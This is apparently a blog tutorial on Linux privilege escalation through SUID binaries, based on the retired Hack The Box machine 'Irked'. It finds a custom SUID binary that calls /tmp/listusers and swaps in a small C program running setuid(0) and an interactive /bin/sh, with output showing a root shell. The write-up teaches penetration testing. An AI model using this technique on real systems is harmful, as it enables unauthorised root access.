SUID Binary Exploit – A Primer

SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather than the user who runs it. Looking for these advanced linux permissions is one of the key steps a penetration tester would perform after the initial foothold to escalate privileges. A command like this will list all binaries with the SUID bit set.
find / -perm -u=s -type f 2>/dev/null.

Let’s look at an example below on how we can leverage this to escalate our privileges. As a penetration tester we are now into the target and we have access as a low priv user. Let’s run that command and see what we find.

user@target:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

user@target:~$ ls -latr /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser

Looking at the output the binary /usr/bin/viewuser looks interesting as it does not appear to be part of a standard linux install. Let’s take a peek into the binary using strings command strings /usr/bin/viewuser | less

/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__cxa_finalize
__libc_start_main
GLIBC_2.0
GLIBC_2.1.3
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
/tmp/listusers
;*2$"
GCC: (Debian 7.2.0-8) 7.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.6586
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
viewuser.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start

Notice the line /tmp/listusers. So the viewuser binary is calling another binary named listusers. Now what we will attempt to do is create our own binary named listusers and have the parent binary call that instead. The binary that we will create will spawn a shell. Now since the SUID bit is set, that shell will be spawned using the permissions of the owner of viewuser which is, you guessed it! root!. Let’s do it then.

Let’s navigate to /tmp, and rename the existing binary to something else. Something like this mv listusers listusers.bak. Now create a c file say listusers.c with the following contents. Compile it using gcc and name the output file as listusers.

user@target:/tmp$ cat listusers.c 
int main(int argc, char **argv) {
	setuid(0);
	system("/bin/sh -i");
	return 0;
}

user@target:/tmp$ gcc listusers.c -o listusers
user@target:/tmp$ ls -ltr
-rwxr-xr-x 1 user user   19 May 26 23:40 listusers.bak
-rw-r--r-- 1 user user   83 May 29 20:49 listusers.c
-rwxr-xr-x 1 user user 5040 May 29 20:52 listusers

Now all there is left to do is execute the /usr/bin/viewuser binary and it should spawn a shell as root.

user@target:/tmp$ /usr/bin/viewuser 
(unknown) :0           2019-05-26 22:01 (:0)
user pts/0        2019-05-29 20:36 (10.10.14.23)
# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# whoami
root

This is pretty much the overall idea of majority of SUID binary exploits.

Reference: This tutorial is based on a wonderful box named “Irked” in Hack The Box which has now retired.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s